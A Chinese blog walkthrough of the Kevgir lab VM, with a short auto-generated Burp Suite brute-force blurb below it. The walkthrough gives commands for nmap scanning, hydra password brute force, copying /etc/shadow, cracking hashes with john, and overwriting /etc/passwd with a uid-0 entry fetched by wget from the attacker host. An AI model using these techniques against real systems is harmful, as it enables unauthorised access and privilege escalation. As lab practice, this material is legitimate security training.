Kevgir靶机渗透——弱口令爆破

一、信息搜集

首先利用ifconfig 指令得到kali 本机的ip 地址:192.168.179.129。

显然这是一个C 类地址,使用nmap 搜索该网络(192.168.179.0/24)下的所有主机。指令为:nmap -sn 192.168.179.0/24。

发现了Kevg 靶机的ip 地址为192.168.179.130。

使用nmap -sV 工具探测Kevg 主机的端口服务。

 

二、外网突破

原本想直接用hydra 尝试爆破root 的密码,但我使用的密码本无法匹配正确的密码,于是用hydra 尝试通过ftp 端口25来爆破admin 用户的密码,发现正好爆破出密码也为admin(这里使用ssh 的1322端口也可以)。

指令为hydra -l admin -P /home/kali/Desktop/passwords.txt 192.168.179.130 ftp -s 25 (password.txt 是我找到的一个比较符合大而精原则的密码本)。

 

使用ssh 远程连接Kevg 靶机,端口为1322,指令为ssh -p 1322 admin@192.168.179.130。输入admin 密码:admin。

成功远程登录靶机的admin 用户。

三、权限提升

权限提升过程中,我一开始想直接修改admin 为root 用户,即在kali 主机上修改passwd 中admin 的uid 和gid 为0,再上传到靶机上覆盖靶机的passwd 文件。但覆盖后发现由于自己当前就是admin 用户,uid 为1002,但此时文件中自己的uid 已经被改成了0,系统无法识别我当前的用户,无法再进行进一步操作。因此必须要再找到另一个用户名,将其修改为root 权限并进行覆盖。

首先,在登录admin 用户之后,查询etc 文件夹下的shadow 文件,该文件存储 Linux 系统中用户的密码信息。

 

 

但该文件只有root 权限才能访问,因此我们可以将其复制出来再访问复制文件,输入cp /etc/shadow shadow1,将文件复制在目前的文件夹下,命名为shadow1:

 

访问shadow1文件:

 

发现三串Hash 密码:

admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::

user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::

root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::

其中admin 的密码破解出来就是admin ,我们的目的是获取除了admin 之外另一个用户的密码,并将该用户修改为root 用户。我首先直接尝试hashcat 以及john 工具暴力破解root 的密码,发现都破解不出来,所以我选择破解user 的密码。我将user 的密码信息存储在桌面上,命名为user,输入指令为:john user,破解得到:

 

即user 用户的密码为resu。那么下一步就是将user 修改为root 权限。

先查看本机passwd,发现本机上没有admin 用户和user 用户,因此,我们需要添加这两个用户(添加用户需要kali 的root 权限)。添加用户使用useradd 指令。

 

添加后,将passwd 复制到桌面上方便下一步调用。查看添加用户后的passwd ,我们只需要将 admin 的 uid 和 gid 改成 Kevg 主机上对应的值,再将user 用户的uid 和gid 都改成0,也就是root 用户。

查看一下靶机admin 用户id:

修改kali 本机的passwd:

 

在kali 主机上建立http 连接,端口为8000,通过该连接可以实现主机和靶机之间的文件传输。

在靶机上利用wget 指令获取主机上的passwd 文件,指令为:wget http://192.168.179.129:8000/passwd。

 

将获取到的passwd 文件覆盖掉靶机中原passwd 文件,并用cat 指令查看,确认已经成功覆盖:

接下来就可以获取root 权限了,输入su user,密码为 resu:

输入whoami 确认自己身份:

完成提权,获得Kevg 靶机root 权限。

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Burp Suite是一款专业的网络安全测试工具,其中的Intruder模块可以用于口令爆破。在使用Burp Suite进行口令爆破时,首先需要选择口令爆破模式,并添加一个爆破字典。 对于题目中的weak_auth,它是指口令爆破。在登录界面中,我们可以尝试使用admin作为用户名和密码进行尝试。同时,在网页源码中也提示了可能需要一个字典。 在进行口令爆破之前,需要进行抓包操作。抓包的目的是捕获输入用户名和密码的过程,以便进行后续的爆破操作。在抓包过程中,需要注意只需要框选出password字段即可,前面的username字段不需要包含在内。 通过以上步骤,我们可以使用Burp Suite的口令爆破功能进行相应的操作。请注意,在进行任何安全测试操作时,应该遵守法律和道德规范,只在合法授权的范围内使用这些工具。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [利用burp suite进行口令爆破 (攻防世界web weak_auth)](https://blog.csdn.net/weixin_43092232/article/details/104555086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [基于BurpSuite的口令爆破](https://blog.csdn.net/m0_51345235/article/details/131174757)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值